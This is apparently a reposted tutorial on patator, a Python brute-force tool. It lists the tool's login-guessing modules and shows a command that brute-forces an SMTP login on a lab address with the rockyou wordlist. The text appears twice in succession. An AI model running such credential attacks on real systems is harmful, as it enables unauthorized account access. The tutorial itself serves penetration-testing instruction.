What is patator?
It is a universal tool brute force, having on board a decent number of modules and the ability to fairly flexible settings. Patator is, as usual, a python script, management is made from cli.
Currently it supports the following modules:
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* ajp_fuzz : Brute-force AJP
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* rlogin_login : Brute-force rlogin
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* rdp_login : Brute-force RDP (NLA)
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* ike_enum : Enumerate IKE transforms
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
Download
root@ddos:~/Desktop# git clone https://github.com/lanjelot/patator.git
root@ddos:~/Desktop# cd patator/
root@ddos:~/Desktop/patator# python patator.py
Example:
Call the module: SMTP_Login
root@ddos:~/Desktop/patator# python patator.py smtp_login
I scanned the network and I know that the host 192.168.1.6 open smtp port (25), try to connect to it via telnet and made sure that everything is OK.
Getting Brutus.
In this case, I know the username that I need, it will Ddos user. Using a hint on using the command above,i get:
python patator.py smtp_login host=192.168.1.6 user=ddos password=FILE0 0=/usr/share/wordlists/rockyou.txt.gz
https://youtu.be/UgBBDUXZSxE
It is a universal tool brute force, having on board a decent number of modules and the ability to fairly flexible settings. Patator is, as usual, a python script, management is made from cli.
Currently it supports the following modules:
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* ajp_fuzz : Brute-force AJP
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* rlogin_login : Brute-force rlogin
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* rdp_login : Brute-force RDP (NLA)
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* ike_enum : Enumerate IKE transforms
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
Download
root@ddos:~/Desktop# git clone https://github.com/lanjelot/patator.git
root@ddos:~/Desktop# cd patator/
root@ddos:~/Desktop/patator# python patator.py
Example:
Call the module: SMTP_Login
root@ddos:~/Desktop/patator# python patator.py smtp_login
I scanned the network and I know that the host 192.168.1.6 open smtp port (25), try to connect to it via telnet and made sure that everything is OK.
Getting Brutus.
In this case, I know the username that I need, it will Ddos user. Using a hint on using the command above,i get:
python patator.py smtp_login host=192.168.1.6 user=ddos password=FILE0 0=/usr/share/wordlists/rockyou.txt.gz
https://youtu.be/UgBBDUXZSxE
Source > https://securityonline.info/2017/04...torbrute-force-attackbrute-force-attack-tool/
